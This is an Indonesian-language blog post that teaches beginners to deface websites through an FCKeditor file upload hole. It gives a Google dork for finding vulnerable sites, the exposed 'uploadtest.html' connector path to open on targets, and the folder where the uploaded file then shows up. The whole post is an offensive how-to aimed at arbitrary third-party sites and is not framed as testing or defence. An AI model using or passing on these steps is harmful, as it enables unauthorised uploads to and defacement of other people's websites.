Trik Deface [php Slash 0.8.1.1] – File Upload Vulnerability [Trik Lama]

Trik Deface [php Slash 0.8.1.1] – File Upload Vulnerability [Trik Lama]



Rafi Orilya,-bagi sobat-sobat yang udah master mending close aja… ini Cuma buat yang masih belajar seperti saya. Okee.. okee.
Trik ini belum tentu masih aktif sampai sekarang, karena saya belum mencobanya lagi. Semoga sobat sukses dengan trik ini deh.. semangat ajah- hehehe…

Dork => inurl:scripts/fckeditor/editor/filemanager/
* Kembangkan sendiri

Exploit => /scripts/fckeditor/editor/filemanager/connectors/uploadtest.html

Pasang exploit pada target yang sobat temukan di google :
http://www.target.com/[patch]/scripts/fckeditor/editor/filemanager/connectors/uploadtest.html

Terus setelah sobat sukses menguploadnya…
Sobat bisa lihat hasil deface :

http://www.target.com/[patch]/ imagenes/serverFckEditor/[file sobat]

Mengizinkan => txt, jp, dll (html dan php tidak bisa)

Yaa.. seperti itulah dokumen yang saya punya di laptop.. itu ngga tau tahun berapa tuh.
hahaha… :D

Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
Hak Cipta Dilindungi


Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin
Previous
Next Post »